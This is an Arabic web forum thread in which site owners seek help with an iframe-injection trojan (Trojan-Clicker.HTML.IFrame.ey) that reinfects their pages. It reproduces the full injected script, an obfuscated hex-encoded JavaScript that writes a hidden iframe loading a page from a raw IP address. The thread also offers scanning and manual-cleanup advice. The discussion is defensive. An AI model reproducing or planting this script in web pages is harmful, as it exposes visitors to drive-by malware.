تروجان المواقع البثر : Trojan-Clicker.HTML.IFrame.ey

[مـازن الضراب]

بعد السلام عليكم ورحمة الله ،


أحب أن أوضح أن
البثر = الغثيث ، ثقيل الظل . .
عند أهل نجد . .

،

السؤال :
تروجان غريب عجيب . . يغزو المواقع وصفحات الHTML وماشابهها تحديدا ً
ويدس كود إعلاني لفتح نوافذ في آخر كود الصفحة . .

مما أعطاه تصنيف : TrojanClicker
في موقع viruslist

حاولت أن أعرف أسبابه ، وطريقة العلاج منه بطريقة عملية صحيحة
لاسيما وأن الموقع ذاته أعلاه لم يذكر أي وصف له وعن طريقة إزالته
http://www.viruslist.com/en/search?V...ey&referer=kav

لكني كنت ببساطة
أقول باستبدال الصفحات المصابة بصفحات أخرى
ويعمل الموقع بسلام . .

باستثناء موقعي !!
فكل ما أقوم باستبدال الصفحة الرئيسية تظهر ما تلبث إلا أن تعود
قمت بتحميل صفحات الموقع كاملة على جهازي لأفحص الخلل
فلم أجد مشكلة إلا في الملفين الآنف ذكرهم .

سؤالي :
هل من حلول لهذا التروجان الغبي ؟
و ماهي طريقة عمله لمنع انتشاره ؟

ولكم الشكر

[مـازن الضراب]

هذا هو الكود الذي يغرسه في نهاية كل صفحة :

كود:

<script>function v481c1bc9d2497(v481c1bc9d2aa0){ var v481c1bc9d2d96=16; return(parseInt(v481c1bc9d2aa0,v481c1bc9d2d96));}function v481c1bc9d35a3(v481c1bc9d39b0){ var v481c1bc9d45a5=2; var v481c1bc9d3dac='';for(v481c1bc9d41a8=0; v481c1bc9d41a8<v481c1bc9d39b0.length; v481c1bc9d41a8+=v481c1bc9d45a5){ v481c1bc9d3dac+=(String.fromCharCode(v481c1bc9d2497(v481c1bc9d39b0.substr(v481c1bc9d41a8, v481c1bc9d45a5))));}return v481c1bc9d3dac;} document.write(v481c1bc9d35a3('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D656533383563363035383166207372633D5C27687474703A2F2F37372E3232312E3133332E3135302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313533292B2735306234366437345C272077696474683D313533206865696768743D31207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

[سحاب اون لاين]

اعمل سكان علي السيرفر
وبعدين ارفع الملفين تاني

[alsultan88]

اخوان انقذوني من هذا التروجان ماذا اعمل
كيف ممكن اعمل سكان للسيرفر؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

[perfetto2001]

عمل سكان لجهازك هذا الترويج بنتقل من جهازك الى موقعك عن طريق ftp

[مبرمج قادم]

السلام عليكم ورحمه الله وبركاته

بحثت لك اخي الكريم ووجدت هذا الرد في منتدى المكتبة الاسلامية للمشرف اسامه

وكان الرد على أحد المواضيع التي يشكو صاحبها من بطىء في موقعه وفتح نوافذ اعلانية .. الخ

ورد عليه الاخ المشرف اسامه وهذا نص رده :

السلام عليكم ورحمه الله وبركاته

هذا تروجان منتشر هذه الأيام على الأنترنت وآصاب ملايين المواقع من كافة الاسكربتات وليس المكتبة فقط .... عانينا منه كثيراً فى موقع طريق الهدى حتى أننا كنا نحذفه يومياً أو ساعات مرتين يومياً من ملفات واندكس موقعنا ... نشرح المشكلة ونبعدين نناقش الحل :

تصنيف التروجان : Iframe Malware
خطورته : عالية جداً حتى الآن

هذا التروجان يعمل بتقنية Iframe Injection >>> او حقن وزرع الأيفريم فى اى موقع يواجهه ويزرع كود أيفريم خفى فى الصفحات index; main; config ... سواء Html او Php .
ولو أصاب اى موقع على سيرفرك ينتقل ليصيب السيرفر بكامل مواقعه ....

وعند دخول زوارك على الموقع ... يجدوا الموقع بطئ جداً وتظهر نوافذ اعلانية كثيرة وساعات النافذة تهنج ويقوم بتحميل تروجان لديك فى ملفات السيستم ( ولاحظت انه فى اماكن مختلفة حسب نوعه ) ويصيب اى موقع تدخل عليه عن طريق الاف تى بى...

ثغرة دخوله وكيفية منعه غير معلومه حتى الآن ولا يوجد حل جذرى لمواجهته على حسب بحثى الذى عملته عنه على مواقع أجنبية وعربية ...

لو بحثتم على جوجل لوجدتم عشرات الناس تشتكى من هذا الكود اللعين ويواجهه نفس المشكلة وعلى سكربتات مختلفة .

مثلاً فى المواقع العربية :
احدهم يشتكى من نفس المشكلة هنا :
تروجان قام بضرب جميع ملفات php و html المخزنة على الجهاز - الويب العربي

واحد يشتكى من اصابته ويستخدم مجلة النيوك :
نيوك عرب - الترقية والتحديثات الأمنية - ثغرة في التصريح user write وكود فيرم خطير

مواقع أجنبية :
احدهم يشتكى من اصابته ويستخدم مجلة Joomla :
BEWARE -Sudden Iframe injection attacks, catastrophic results - Help! - Web Hosting Talk - The largest, most influential web hosting community on the Internet

وآخر يشتكى من اصابته ويستخدم مدونة WordPress :
WordPress › Support » iframe injection problem?

أفضل حل وجدته لهذا التروجان بعد تجارب طويلة هو التالى :
1- أفصل كابل الشبكة .
2- اخذ نسخة احتياطية من ملفاتك المهمة .
3- عمل فورمات للسى وتحميل الويندوز من جديد ( انتظر لا تركب الكابل )
4- تنزيل أنتى فيرس قوى مثل الكاسبرسكاى الاصدار 7 .
5- امامك خيارين اما ان تنزل اى من برامج جدار النار Firewall مثل ZoneAlarm أو تفعيل خاصية Proactive Defense فى كاسبرسكاى الاصدار 7 وهى خاصية لا تسمح بأى ملف ان يتصل بالأنترنت او تغيير ملفات الريجستيرى قبل سؤالك بنعم أو لا .. تماما مثل جدار النار .
ربما يكون ذلك مزعج للبعض لكن بالنسبة لى أفضل من ان يجد زوارى الموقع ملئ بالتروجانات .
6- ركب كابل الشبكة وأعمل تحديث لبرنامج الانتى فيرس حتى آخر ابديت .
7- احذف الكود اللعين من ملفات موقعك بالكامل عن طريق تحريرها بأى برنامج مثل النوتباد وحذف الكود واعادة رفعها .
8- لا مفيش خطوات تانى خلاص ..

الحل ده قلل الاصابة عندى للحد الأدنى ... تقريباً الموقع عندى بيصاب كل 4 أيام مرة واحدة بس ... ويمكن ميكونش من جهازى كمان يكون أى سبب خارجى أو شركائى فى الموقع

وهذا رابط الموضوع اخي الكريم لعلك تستفيد منه

ماالذى حدث للمكتبة الاسلامية - (Powered By MySmartBB)

[مـازن الضراب]

بوركَ فيكم . .
أشكر لكم التفاعل . .

قمت بعمل فحص لجهازي كاملا ً
ثم أتبعته بفحص للسيرفر
ورفعت الملفات المصابة واستبدلتها
وحتى الآن الأمور طيبة

كلام الأخ / أسامة .. في الصميم
ويبقى هذا التروجان . . وطريقة عمله - لغز -
لم يتم حله : (

موفقين

[مـازن الضراب]

إلى الآن أعاني منه في كثير من المواقع
ويضعني في موقف حرج أمام العملاء . .

هل لديكم تجارب سابقة ناجخة في استئصال هذا الفايرس الخبيث ؟
أم أننا سنطلق عليه اسم - سرطان المواقع -
ويبقى دون علاج واضح :s

ننتظركم وتجاربكم

[abdellahjawal]

أخواني الحل الأكيد هو تنزيل الكاسبر وعمل سكان للجهاز وسوف يجد التروجان وقم بحذفها وقم انت بإستبدال صفحات الاندكس المضروبة
وانتهى

[أحمد خلف]

واجهت هذي المشكلة وساعدني فيها الشباب

افحص جهازك جيداً بالكسبر وغير برنامج الاف تي بي

ادخل جميع الصفحات التي تنتهي ب html , php

واحذف كود التروجان من داخلهم ان وجد فهو يا بالاعلى او في الاسفل